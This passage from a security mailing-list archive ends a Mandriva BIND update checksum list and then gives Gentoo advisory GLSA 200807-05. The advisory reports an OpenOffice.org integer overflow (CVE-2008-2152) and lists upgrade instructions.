4294b3a086b89bf53c5c967c17962447 2008.1/x86_64/bind-utils-9.5.0-3mdv2008.1.x86_64.rpm 70fc7a7964944a2926979710c5148ed1 2008.1/SRPMS/bind-9.5.0-3mdv2008.1.src.rpm Corporate 3.0: de2a4372d1c25d73f343c9fcb044c9dd corporate/3.0/i586/bind-9.2.3-6.5.C30mdk.i586.rpm 1f24f6dbdb6c02e21cbbef99555049cb corporate/3.0/i586/bind-devel-9.2.3-6.5.C30mdk.i586.rpm 00405b98290d5a41f226081baa57e18d corporate/3.0/i586/bind-utils-9.2.3-6.5.C30mdk.i586.rpm 6a237dc290f4f7c463b1996e6a4a4515 corporate/3.0/SRPMS/bind-9.2.3-6.5.C30mdk.src.rpm Corporate 3.0/X86_64: 628162f3d6a414828d2231fefc46842b corporate/3.0/x86_64/bind-9.2.3-6.5.C30mdk.x86_64.rpm dd29ff31a9cffcc1b20fd045869d7013 corporate/3.0/x86_64/bind-devel-9.2.3-6.5.C30mdk.x86_64.rpm c475c1a4d048e04da1fc27dcbb17c3f3 corporate/3.0/x86_64/bind-utils-9.2.3-6.5.C30mdk.x86_64.rpm 6a237dc290f4f7c463b1996e6a4a4515 corporate/3.0/SRPMS/bind-9.2.3-6.5.C30mdk.src.rpm Corporate 4.0: 271ead204904be302d197cd542f5ae23 corporate/4.0/i586/bind-9.3.5-0.4.20060mlcs4.i586.rpm 42413dcc1cf053e735216f767eff4e5d corporate/4.0/i586/bind-devel-9.3.5-0.4.20060mlcs4.i586.rpm 0201afe493a41e1deedc9bf7e9725f4a corporate/4.0/i586/bind-utils-9.3.5-0.4.20060mlcs4.i586.rpm 86bc0cdc9ed1b959b6f56e0660268f2e corporate/4.0/SRPMS/bind-9.3.5-0.4.20060mlcs4.src.rpm Corporate 4.0/X86_64: b1a18a7d0578dab7bd825eda6c682b3d corporate/4.0/x86_64/bind-9.3.5-0.4.20060mlcs4.x86_64.rpm 6a2ebd550feb9147058de05b1a1ef04d corporate/4.0/x86_64/bind-devel-9.3.5-0.4.20060mlcs4.x86_64.rpm 670a1b934ce4974b8505018ab69ade0b corporate/4.0/x
[ GLSA 200807-05 ] OpenOffice.org: User-assisted execution of arbitrary code
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200807-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: OpenOffice.org: User-assisted execution of arbitrary code Date: July 09, 2008 Bugs: #225723 ID: 200807-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis An integer overflow vulnerability has been reported in OpenOffice.org. Background == OpenOffice.org is an open source office productivity suite, including word processing, spreadsheet, presentation, drawing, data charting, formula editing, and file conversion facilities. Affected packages = --- Package/ Vulnerable /Unaffected --- 1 app-office/openoffice < 2.4.1 >= 2.4.1 2 app-office/openoffice-bin < 2.4.1 >= 2.4.1 --- 2 affected packages on all of their supported architectures. --- Description === Sean Larsson (iDefense Labs) reported an integer overflow in the function rtl_allocateMemory() in the file sal/rtl/source/alloc_global.c. Impact == A remote attacker could entice a user to open a specially crafted document, possibly resulting in the remote execution of arbitrary code with the privileges of the user running the application. Workaround == There is no known workaround at this time. Resolution == All OpenOffice.org users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-office/openoffice-2.4.1" All OpenOffice.org binary users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-office/openoffice-bin-2.4.1" References == [ 1 ] CVE-2008-2152 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2152 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200807-05.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFIdSRCuhJ+ozIKI5gRAlOjAJ4whHqQ38JFpyg7zOQJzYJThUrE7QCggkRa HLaX9QPKt44BGyCrLNfK34Y= =g7A9 -END PGP SIGNATURE-